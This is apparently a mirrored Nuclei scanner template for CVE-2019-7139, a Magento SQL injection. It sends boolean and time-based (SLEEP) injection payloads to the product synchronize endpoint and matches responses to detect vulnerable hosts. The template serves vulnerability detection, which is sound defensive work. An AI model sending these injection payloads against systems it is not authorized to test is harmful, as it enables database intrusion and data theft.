daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2019/CVE-2019-7139.yaml

53 lines
2.3 KiB
YAML
Raw Normal View History

Fixes and 2023 CvEs
2024-03-16 17:23:48 +00:00
id: CVE-2019-7139
info:
name: CVE-2019-7139
author: MaStErChO
severity: high
description: |
The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied from and to inputs to the prepareSqlCondition function of the Magento\Framework\DB\Adapter\Pdo\Mysql class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
metadata:
framework: magento
tags: sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: Blind
dsl:
yaml fix
2024-03-16 17:42:53 +00:00
- 'contains(body_1, "text/x-magento-init")'
- 'status_code_2 == 200'
- 'status_code_3 == 400'
- 'contains(content_type_2, "application/json")'
- 'contains(content_type_3, "application/json")'
- 'len(body_2) == 2'
- 'len(body_3) == 2'
Fixes and 2023 CvEs
2024-03-16 17:23:48 +00:00
condition: and
- type: dsl
name: Time
dsl:
yaml fix
2024-03-16 17:42:53 +00:00
- 'contains(body_1, "text/x-magento-init")'
- 'duration_4>=6'
- 'contains(content_type_4, "application/json")'
- 'len(body_4) == 2'
condition: and